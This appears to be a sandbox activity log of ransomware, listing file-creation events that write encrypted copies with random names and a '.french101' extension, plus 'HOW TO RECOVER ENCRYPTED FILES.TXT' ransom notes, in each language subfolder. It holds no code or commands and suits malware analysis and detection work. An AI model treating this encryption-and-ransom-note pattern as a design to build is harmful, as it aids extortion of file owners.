Create	C:\588bce7c90097ed212\1035\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1035\uWOU20Gf4z6kjao3S2KHyA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1035\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1035\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1035\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1035\k5Cc4o8jPGNe=hM5t3ztv+Vw1IrQN43OWa5Y9j=BneSr1Q.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1035\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1036\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\7KfhbfTCxDtM4vdbZhIQM4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1036\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\zeO3fsc=jkrlpStOJ1nr5PXT2AaD+edX78mteIB05a9ZUQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1036\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1037\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\URfWfKaOLBnIeqVKIkr9lk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1037\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\A6Sp2ADZ6ug7agx397Vv=Wb7OQx8MlTxkBnztsCrZyu8wk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1037\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1038\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\GTM5rHMJYIj5vncRwRwRT4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1038\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\+sYYZLCNv5Ume9ALuXonKTe65jLuGGGuN=UR3OLz2DQaok.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1038\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1040\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\cRXncCJPLSyZdzdoi4qNuk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1040\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\WKRdENIya6cmJPpxuoLrGpa9eLZja5+uHtMsvaRkGTS0mQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1040\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1041\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\qZviTx06yKGqY06ej5rXg4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1041\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\x4Rg5JzXr+wbktLoYzc6=B1P7ucKyAfakEWeAVHTFreAZ4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1041\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1042\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\oNaaV96b2IHYU16PUvk8rk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1042\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\HzU1fVnk=dIfPFNfOKw3v1oMgG8jx8XJbFcEa51fDQwonQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1042\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1043\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\cBKg4SWVMpCksc+43x05RA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1043\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\YAopRJ0z0RGnbEOwV7fMLnU+whdNrZ2LITFNKGnKJB8gLA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1043\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1044\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\ZEVqNsKUOPPuClTLLtVciA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1044\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\4Pd39KVyMIHvfDa80Cqz3QOqtA6DM=TGVUWsWAEwr6PWDk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1044\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1045\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\y99Xr8wA2Hr7EZmRBLwu+Q.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1045\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\tgsjuNw7TIfIFWwNB87mM3S2WeDxQ5RS7ijSvAjzuRCGPQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1045\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1046\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\ReAoNvMFVUsZwXTTvw6jB4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1046\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\DSi+27cFVBYhPuq5MTuBR1cyxBGfJ+qY+Ff5FsZxIzpYOQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1046\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1049\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\tcyx3o6S25VpsswEx0Cpnk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1049\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\zeLrW2YqT+QyTBRkGt+0=gQGuZegjlk=aJfWvZsD5S7eAQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1049\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1053\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\YHEFAZ=+peduHPilVNvACk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1053\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\2UlmmFdmXf3jHxXf0Kbn0Uuf9YJHdc2hffQj7aixgqwc5A.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1053\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1055\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\yNkSrZ=dHzgO=52MaCGwnQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\1055\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\2Tg4xH7Bxe1+pMm3tQ2pkBbd+rjDVGkI1dqO9P7iDgnq0A.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\1055\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\2052\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\rj63MYiNLskACSqG+=VWwA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\2052\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\Yz5AXqULpQhk+lvHwUFYRX2atu7P5qRTT1HiL=JMeuyrhQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2052\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\2070\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\W=x1rFlgmb9WOmNXe8KPlQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\2070\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\P=aYqIgfEBmwT=MAKmZQUYn6iG5ijVmXgRsTIR9uonSZkA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\2070\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\3076\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\0s92NwdTiFlGhQyyEtdorQ.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\3076\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\A6J7s3p1u3BGBe0MhmCJ+rgDT3=MCrcIF5RYFfMEjdqoTk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3076\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\eula.rtf	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\3082\eula.rtf	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\IxZIbBUYAOCNLr+QnPbd+4.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\LocalizedData.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\3082\LocalizedData.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\tGdmHnjocwBYGlVQclZdLWU36UcQSVEt5QXiwy+VG+t5pk.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\3082\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\я	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\Parameterinfo.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
Create	C:\588bce7c90097ed212\Client\Parameterinfo.xml	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\sJJEll8DFqbCbJstgQJNyRmV77d5+Jq5KazGbGKhtgbZeA.french101	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\HOW TO RECOVER ENCRYPTED FILES.TXT	desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL	1	Fn
Create	C:\588bce7c90097ed212\Client\UiInfo.xml	desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL	2	Fn
